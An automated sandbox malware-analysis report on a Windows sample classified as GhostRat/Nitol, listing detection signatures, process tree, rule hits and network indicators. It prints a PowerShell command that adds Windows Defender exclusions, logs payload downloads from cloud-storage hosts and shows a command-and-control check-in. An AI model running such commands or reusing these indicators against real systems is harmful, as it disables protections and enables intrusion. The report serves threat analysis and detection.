Edit tour

Windows Analysis Report
setup.ic19.exe

Overview

General Information

Sample name:	setup.ic19.exe
Analysis ID:	1523811
MD5:	e1c81c53c0fcd8301a0a51cdb1669ccc
SHA1:	5c8a9f629a0b9399fd829cc8eeb9c31c7bf6c173
SHA256:	811ba62844f5aac8675ffb5ab6d2166097231beeba58ce46be708fa06257e0bd
Tags:	Backdoorexeuser-GDHJDSYDH
Infos:

Detection

GhostRat, Nitol

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Detected unpacking (creates a PE file in dynamic memory)

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected GhostRat

Yara detected Nitol

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Contains functionality to capture and log keystrokes

Contains functionality to modify Windows User Account Control (UAC) settings

Creates an undocumented autostart registry key

Found direct / indirect Syscall (likely to bypass EDR)

Found evasive API chain (may stop execution after checking mutex)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

PE file contains section with special chars

Sample is not signed and drops a device driver

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Switches to a custom stack to bypass stack traces

Tries to delay execution (extensive OutputDebugStringW loop)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

AV process strings found (often used to terminate AV products)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to clear windows event logs (to hide its activities)

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to launch a process as a different user

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain (may stop execution after checking a module file name)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

setup.ic19.exe (PID: 6876 cmdline: "C:\Users\user\Desktop\setup.ic19.exe" MD5: E1C81C53C0FCD8301A0A51CDB1669CCC)

8AfroU.exe (PID: 4124 cmdline: C:\Users\user\AppData\Roaming\8AfroU.exe MD5: 43A2E3DC4152AE380E60A53765B78787)

8AfroU.exe (PID: 4452 cmdline: C:\Users\user\AppData\Roaming\8AfroU.exe MD5: 43A2E3DC4152AE380E60A53765B78787)

lXAMaI.exe (PID: 6852 cmdline: "C:\Program Files (x86)\lXAMaI\lXAMaI.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

cmd.exe (PID: 6044 cmdline: cmd /c echo.>c:\xxxx.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3960 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)' -Force MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 2308 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

lXAMaI.exe (PID: 6672 cmdline: "C:\Program Files (x86)\lXAMaI\lXAMaI.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

80c2T80R.exe (PID: 6972 cmdline: "C:\Program Files (x86)\eL62Gl4\80c2T80R.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

80c2T80R.exe (PID: 3244 cmdline: "C:\Program Files (x86)\eL62Gl4\80c2T80R.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

lXAMaI.exe (PID: 4412 cmdline: "C:\Program Files (x86)\lXAMaI\lXAMaI.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

80c2T80R.exe (PID: 3804 cmdline: "C:\Program Files (x86)\eL62Gl4\80c2T80R.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

lXAMaI.exe (PID: 5840 cmdline: "C:\Program Files (x86)\lXAMaI\lXAMaI.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Nitol		No Attribution	https://asec.ahnlab.com/en/44504/ https://blogs.technet.microsoft.com/microsoft_blog/2012/09/13/microsoft-disrupts-the-emerging-nitol-botnet-being-spread-through-an-unsecure-supply-chain/ https://en.wikipedia.org/wiki/Nitol_botnet https://krebsonsecurity.com/tag/nitol/	https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Process Memory Space: lXAMaI.exe PID: 6852	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
Process Memory Space: lXAMaI.exe PID: 6852	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Process Memory Space: lXAMaI.exe PID: 6852	PlugXStrings	PlugX Identifying Strings	Seth Hardy	0x322f7:$Dwork: d:\work 0x4668d:$Dwork: d:\work 0x8d3b3:$Dwork: d:\work 0x4c598:$Shell6: Shell6 0x4d368:$Shell6: Shell6
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.2.lXAMaI.exe.43d03e8.7.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
7.2.lXAMaI.exe.43d03e8.7.raw.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
7.2.lXAMaI.exe.10000000.8.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
7.2.lXAMaI.exe.10000000.8.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
7.2.lXAMaI.exe.43d03e8.7.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
7.2.lXAMaI.exe.43d03e8.7.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
7.2.lXAMaI.exe.2de0000.4.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x222dd:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x2235b:$e2: Add-MpPreference -ExclusionPath
Click to see the 2 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)' -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files (x86)\lXAMaI\lXAMaI.exe" , ParentImage: C:\Program Files (x86)\lXAMaI\lXAMaI.exe, ParentProcessId: 6852, ParentProcessName: lXAMaI.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)' -Force, ProcessId: 3960, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)' -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files (x86)\lXAMaI\lXAMaI.exe" , ParentImage: C:\Program Files (x86)\lXAMaI\lXAMaI.exe, ParentProcessId: 6852, ParentProcessName: lXAMaI.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)' -Force, ProcessId: 3960, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T04:28:59.059603+0200	2852901	1	Malware Command and Control Activity Detected	192.168.2.4	49752	47.76.31.57	9098	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Program Files (x86)\lXAMaI\tbcore3U.dll	Avira: detection malicious, Label: HEUR/AGEN.1300189
Source: C:\Program Files (x86)\eL62Gl4\tbcore3U.dll	Avira: detection malicious, Label: HEUR/AGEN.1300189

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\lXAMaI\tbcore3U.dll	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\eL62Gl4\tbcore3U.dll	Joe Sandbox ML: detected

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe

Unpacked PE file: 7.2.lXAMaI.exe.3600000.6.unpack

Source: unknown	HTTPS traffic detected: 39.103.20.76:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 118.178.60.61:443 -> 192.168.2.4:49744 version: TLS 1.2

Source:	Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: lXAMaI.exe, 00000007.00000000.2783978320.0000000000438000.00000002.00000001.01000000.00000009.sdmp, lXAMaI.exe, 00000007.00000002.3502638996.0000000000438000.00000002.00000001.01000000.00000009.sdmp, lXAMaI.exe, 00000007.00000002.3502823696.000000000065E000.00000004.00000020.00020000.00000000.sdmp, lXAMaI.exe, 00000008.00000002.2823804741.0000000000438000.00000002.00000001.01000000.00000009.sdmp, lXAMaI.exe, 00000008.00000000.2808630341.0000000000438000.00000002.00000001.01000000.00000009.sdmp, 80c2T80R.exe, 00000009.00000002.2825983477.0000000000428000.00000002.00000001.01000000.0000000B.sdmp, 80c2T80R.exe, 00000009.00000000.2812579803.0000000000428000.00000002.00000001.01000000.0000000B.sdmp, 80c2T80R.exe, 0000000C.00000002.2874143335.0000000000428000.00000002.00000001.01000000.0000000B.sdmp, 80c2T80R.exe, 0000000C.00000000.2862513779.0000000000428000.00000002.00000001.01000000.0000000B.sdmp, lXAMaI.exe, 0000000D.00000002.2879628160.0000000000438000.00000002.00000001.01000000.00000009.sdmp, lXAMaI.exe, 0000000D.00000000.2868833461.0000000000438000.00000002.00000001.01000000.00000009.sdmp, 80c2T80R.exe, 00000011.00000000.3452631941.0000000000428000.00000002.00000001.01000000.0000000B.sdmp, 80c2T80R.exe, 00000011.00000002.3460559431.0000000000428000.00000002.00000001.01000000.0000000B.sdmp, lXAMaI.exe, 00000012.00000000.3458920019.0000000000438000.00000002.00000001.01000000.00000009.sdmp, lXAMaI.exe, 00000012.00000002.3476901708.0000000000438000.00000002.00000001.01000000.00000009.sdmp, lXAMaI.exe.5.dr, 80c2T80R.exe.7.dr
Source:	Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: Atrebution.sys.0.dr

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe

Code function: 7_2_100040C1 FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,

7_2_100040C1

Source: C:\Users\user\AppData\Roaming\8AfroU.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Code function: 4x nop then lea rbx, qword ptr [rsp+40h]	4_2_00411990
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Code function: 4x nop then mov eax, ecx	4_2_00410AE0
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Code function: 4x nop then movsxd rbx, qword ptr [r14+10h]	4_2_00409A90
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Code function: 4x nop then movzx eax, byte ptr [r8+rdx]	4_2_0040EF30
Source: C:\Users\user\AppData\Roaming\8AfroU.exe	Code function: 4x nop then movsxd rcx, qword ptr [r12+10h]	4_2_00409F90

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.4:49752 -> 47.76.31.57:9098

Source: global traffic

TCP traffic: 192.168.2.4:49752 -> 47.76.31.57:9098

Source: Joe Sandbox View

ASN Name: VODAFONE-TRANSIT-ASVodafoneNZLtdNZ VODAFONE-TRANSIT-ASVodafoneNZLtdNZ

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 47.76.31.57
Source: unknown	TCP traffic detected without corresponding DNS query: 47.76.31.57
Source: unknown	TCP traffic detected without corresponding DNS query: 47.76.31.57
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Program Files (x86)\lXAMaI\lXAMaI.exe

Code function: 7_2_10001789 select,recv,

7_2_10001789

Source: global traffic	HTTP traffic detected: GET /i.dat HTTP/1.1User-Agent: GetDataHost: 101oss.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /a.gif HTTP/1.1User-Agent: GetDataHost: 101oss.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b.gif HTTP/1.1User-Agent: GetDataHost: 101oss.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c.gif HTTP/1.1User-Agent: GetDataHost: 101oss.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d.gif HTTP/1.1User-Agent: GetDataHost: 101oss.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s.dat HTTP/1.1User-Agent: GetDataHost: 101oss.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s.jpg HTTP/1.1User-Agent: GetDataHost: 101oss.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drops.jpg HTTP/1.1User-Agent: GetDataHost: 10mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f.dat HTTP/1.1User-Agent: GetDataHost: 10mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-50.jpg HTTP/1.1User-Agent: GetDataHost: 10mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-51.jpg HTTP/1.1User-Agent: GetDataHost: 10mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-52.jpg HTTP/1.1User-Agent: GetDataHost: 10mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-53.jpg HTTP/1.1User-Agent: GetDataHost: 10mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: 101oss.oss-cn-beijing.aliyuncs.com
Source: global traffic	DNS traffic detected: DNS query: 10mm.oss-cn-hangzhou.aliyuncs.com
Source: global traffic	DNS traffic detected: DNS query: hteyov.net

Source: lXAMaI.exe, lXAMaI.exe, 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%s/%d.dll
Source: lXAMaI.exe, 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%s/%d.dllC:
Source: lXAMaI.exe, lXAMaI.exe, 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%s/ip.txt
Source: lXAMaI.exe, 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%s/ip.txtC:
Source: lXAMaI.exe, lXAMaI.exe, 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%s/upx.rar
Source: lXAMaI.exe, 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmp, lXAMaI.exe, 00000007.00000002.3510821046.00000000043D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%s/upx.rarC:
Source: Atrebution.sys.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: Atrebution.sys.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: Atrebution.sys.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: Atrebution.sys.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: Atrebution.sys.0.dr	String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: Atrebution.sys.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: Atrebution.sys.0.dr	String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: powershell.exe, 0000000E.00000002.3220521632.000000000514E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: Atrebution.sys.0.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: Atrebution.sys.0.dr	String found in binary or memory: http://ocsp.digicert.com0P
Source: Atrebution.sys.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 0000000E.00000002.3216421375.0000000004245000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000E.00000002.3216421375.0000000004245000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000E.00000002.3216421375.00000000040F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000E.00000002.3216421375.0000000004245000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Atrebution.sys.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Atrebution.sys.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Atrebution.sys.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: powershell.exe, 0000000E.00000002.3216421375.0000000004245000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: setup.ic19.exe	String found in binary or memory: http://www.dameware.com/products/dntu/0
Source: Atrebution.sys.0.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: powershell.exe, 0000000E.00000002.3228787134.0000000007CAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c
Source: setup.ic19.exe, 00000000.00000003.1900207800.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1900207800.0000000000609000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1874118144.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1900207800.0000000000611000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1874118144.0000000000609000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1874118144.0000000000611000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://101oss.oss-cn-beijing.aliyuncs.com/
Source: setup.ic19.exe, 00000000.00000003.1900207800.0000000000609000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://101oss.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-1002_
Source: setup.ic19.exe, 00000000.00000003.1900207800.0000000000609000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1874118144.0000000000609000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://101oss.oss-cn-beijing.aliyuncs.com/7-2476756634-1002
Source: setup.ic19.exe, 00000000.00000003.1900207800.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1874118144.00000000005F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://101oss.oss-cn-beijing.aliyuncs.com/H
